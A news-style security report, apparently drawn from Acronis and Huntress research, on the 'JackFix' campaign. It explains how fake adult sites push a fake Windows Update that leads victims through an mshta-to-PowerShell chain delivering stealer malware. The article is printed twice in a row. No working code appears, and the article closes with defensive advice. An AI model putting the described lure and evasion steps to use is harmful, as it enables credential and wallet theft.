Cybersecurity experts are raising alarms about a sophisticated new campaign that exploits a blend of ClickFix tactics and counterfeit adult websites to mislead users into executing harmful commands, all under the pretense of a “critical” Windows security update. According to a recent report from Acronis shared with The Hacker News, this campaign employs fake adult sites, including clones of popular platforms like xHamster and PornHub, as its primary phishing mechanism. The adult-themed context, coupled with the dubious nature of these websites, amplifies the psychological pressure on victims to comply with the sudden prompt for a “security update.”
Emergence of ClickFix Attacks
ClickFix-style attacks have seen a notable rise over the past year, with these schemes adeptly tricking users into executing malicious commands on their devices through prompts that suggest technical fixes or require CAPTCHA verification. Data from Microsoft indicates that ClickFix has emerged as the leading method for initial access, accounting for 47% of all attacks.
The latest iteration of this campaign showcases highly convincing fake Windows update screens designed to persuade victims to run malicious code. This shift marks a departure from traditional robot-check lures, with the activity being dubbed JackFix by the Singapore-based cybersecurity firm.
One of the most alarming features of this attack is the way the counterfeit Windows update alert commandeers the entire screen, instructing victims to open the Windows Run dialog, press Ctrl + V, and hit Enter, thereby initiating the infection sequence. The attack typically begins with users being redirected to a fake adult site via malvertising or other social engineering tactics, where they are suddenly confronted with an “urgent security update.” Some versions of these sites have been found to include developer comments in Russian, suggesting a possible link to Russian-speaking threat actors.
Technical Intricacies of the Attack
Security researcher Eliad Kimhy elaborates on the mechanics behind the attack, noting that the counterfeit Windows Update screen is entirely crafted using HTML and JavaScript. It activates as soon as the victim interacts with any element on the phishing site, attempting to take over the screen through JavaScript while presenting a convincing Windows Update window that mimics the notorious blue screen of death.
What sets this attack apart is its heavy reliance on obfuscation to hide ClickFix-related code, alongside measures to prevent users from escaping the full-screen alert by disabling the Escape and F11 keys, as well as F5 and F12. However, due to a flaw in the logic, users can still utilize the Escape and F11 buttons to exit the full-screen mode.
The initial command executed is an MSHTA payload launched via the legitimate mshta.exe binary. This payload contains JavaScript designed to execute a PowerShell command that retrieves another PowerShell script from a remote server. Notably, these domains are structured so that directly navigating to them redirects users to benign sites like Google or Steam.
Acronis explains that only when the site is accessed through an irm or iwr PowerShell command does it respond with the intended code, adding an extra layer of obfuscation and hindering analysis efforts.
Payloads and Potential Risks
The downloaded PowerShell script incorporates various obfuscation and anti-analysis techniques, including the use of garbage code to complicate analysis. It also seeks to elevate privileges and create exclusions in Microsoft Defender Antivirus for command-and-control (C2) addresses and paths where the payloads are staged.
To achieve privilege escalation, the malware employs the Start-Process cmdlet with the “-Verb RunAs” parameter to launch PowerShell with administrative rights, persistently prompting for permission until granted by the victim. Once this stage is successful, the script is designed to deploy additional payloads, including remote access trojans (RATs) that connect to a C2 server, likely to introduce more malware.
The PowerShell script has been observed to deliver up to eight different payloads, with Acronis describing it as the “most egregious example of spray and pray.” These payloads include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, among others. Kimhy warns that if even one of these payloads executes successfully, victims risk losing sensitive information such as passwords and cryptocurrency wallets. In some cases, attackers may opt to introduce additional payloads, escalating the attack further.
Related Campaigns and Defense Strategies
The disclosure of this campaign coincides with Huntress’s findings on a multi-stage malware execution chain that also originates from a ClickFix lure disguised as a Windows update, deploying stealer malware like Lumma and Rhadamanthys while concealing final stages within an imageāa technique known as steganography.
In a similar vein, the ClickFix command copied to the clipboard and pasted into the Run dialog utilizes mshta.exe to execute a JavaScript payload capable of running a remotely-hosted PowerShell script directly in memory. This PowerShell code is responsible for decrypting and launching a .NET assembly payload, referred to as Stego Loader, which serves as a conduit for executing Donut-packed shellcode hidden within an embedded and encrypted PNG file. The extracted shellcode is then injected into a target process to ultimately deploy Lumma or Rhadamanthys.
Interestingly, one of the domains identified by Huntress for fetching the PowerShell script (“securitysettings[.]live”) has also been flagged by Acronis, indicating a potential connection between these two activity clusters. Security researchers Ben Folland and Anna Pham note that the threat actor frequently alters the URI used to host the initial mshta.exe stage, showcasing a dynamic approach to evading detection.
As ClickFix continues to gain traction, leveraging a straightforward yet effective method to entice users into compromising their own machines and bypassing security measures, organizations are urged to bolster defenses. Training employees to recognize such threats and disabling the Windows Run box through Registry changes or Group Policy can significantly mitigate risks associated with these attacks.
JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers
Cybersecurity experts are raising alarms about a sophisticated new campaign that exploits a blend of ClickFix tactics and counterfeit adult websites to mislead users into executing harmful commands, all under the pretense of a “critical” Windows security update. According to a recent report from Acronis shared with The Hacker News, this campaign employs fake adult sites, including clones of popular platforms like xHamster and PornHub, as its primary phishing mechanism. The adult-themed context, coupled with the dubious nature of these websites, amplifies the psychological pressure on victims to comply with the sudden prompt for a “security update.”
Emergence of ClickFix Attacks
ClickFix-style attacks have seen a notable rise over the past year, with these schemes adeptly tricking users into executing malicious commands on their devices through prompts that suggest technical fixes or require CAPTCHA verification. Data from Microsoft indicates that ClickFix has emerged as the leading method for initial access, accounting for 47% of all attacks.
The latest iteration of this campaign showcases highly convincing fake Windows update screens designed to persuade victims to run malicious code. This shift marks a departure from traditional robot-check lures, with the activity being dubbed JackFix by the Singapore-based cybersecurity firm.
One of the most alarming features of this attack is the way the counterfeit Windows update alert commandeers the entire screen, instructing victims to open the Windows Run dialog, press Ctrl + V, and hit Enter, thereby initiating the infection sequence. The attack typically begins with users being redirected to a fake adult site via malvertising or other social engineering tactics, where they are suddenly confronted with an “urgent security update.” Some versions of these sites have been found to include developer comments in Russian, suggesting a possible link to Russian-speaking threat actors.
Technical Intricacies of the Attack
Security researcher Eliad Kimhy elaborates on the mechanics behind the attack, noting that the counterfeit Windows Update screen is entirely crafted using HTML and JavaScript. It activates as soon as the victim interacts with any element on the phishing site, attempting to take over the screen through JavaScript while presenting a convincing Windows Update window that mimics the notorious blue screen of death.
What sets this attack apart is its heavy reliance on obfuscation to hide ClickFix-related code, alongside measures to prevent users from escaping the full-screen alert by disabling the Escape and F11 keys, as well as F5 and F12. However, due to a flaw in the logic, users can still utilize the Escape and F11 buttons to exit the full-screen mode.
The initial command executed is an MSHTA payload launched via the legitimate mshta.exe binary. This payload contains JavaScript designed to execute a PowerShell command that retrieves another PowerShell script from a remote server. Notably, these domains are structured so that directly navigating to them redirects users to benign sites like Google or Steam.
Acronis explains that only when the site is accessed through an irm or iwr PowerShell command does it respond with the intended code, adding an extra layer of obfuscation and hindering analysis efforts.
Payloads and Potential Risks
The downloaded PowerShell script incorporates various obfuscation and anti-analysis techniques, including the use of garbage code to complicate analysis. It also seeks to elevate privileges and create exclusions in Microsoft Defender Antivirus for command-and-control (C2) addresses and paths where the payloads are staged.
To achieve privilege escalation, the malware employs the Start-Process cmdlet with the “-Verb RunAs” parameter to launch PowerShell with administrative rights, persistently prompting for permission until granted by the victim. Once this stage is successful, the script is designed to deploy additional payloads, including remote access trojans (RATs) that connect to a C2 server, likely to introduce more malware.
The PowerShell script has been observed to deliver up to eight different payloads, with Acronis describing it as the “most egregious example of spray and pray.” These payloads include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, among others. Kimhy warns that if even one of these payloads executes successfully, victims risk losing sensitive information such as passwords and cryptocurrency wallets. In some cases, attackers may opt to introduce additional payloads, escalating the attack further.
Related Campaigns and Defense Strategies
The disclosure of this campaign coincides with Huntress’s findings on a multi-stage malware execution chain that also originates from a ClickFix lure disguised as a Windows update, deploying stealer malware like Lumma and Rhadamanthys while concealing final stages within an imageāa technique known as steganography.
In a similar vein, the ClickFix command copied to the clipboard and pasted into the Run dialog utilizes mshta.exe to execute a JavaScript payload capable of running a remotely-hosted PowerShell script directly in memory. This PowerShell code is responsible for decrypting and launching a .NET assembly payload, referred to as Stego Loader, which serves as a conduit for executing Donut-packed shellcode hidden within an embedded and encrypted PNG file. The extracted shellcode is then injected into a target process to ultimately deploy Lumma or Rhadamanthys.
Interestingly, one of the domains identified by Huntress for fetching the PowerShell script (“securitysettings[.]live”) has also been flagged by Acronis, indicating a potential connection between these two activity clusters. Security researchers Ben Folland and Anna Pham note that the threat actor frequently alters the URI used to host the initial mshta.exe stage, showcasing a dynamic approach to evading detection.
As ClickFix continues to gain traction, leveraging a straightforward yet effective method to entice users into compromising their own machines and bypassing security measures, organizations are urged to bolster defenses. Training employees to recognize such threats and disabling the Windows Run box through Registry changes or Group Policy can significantly mitigate risks associated with these attacks.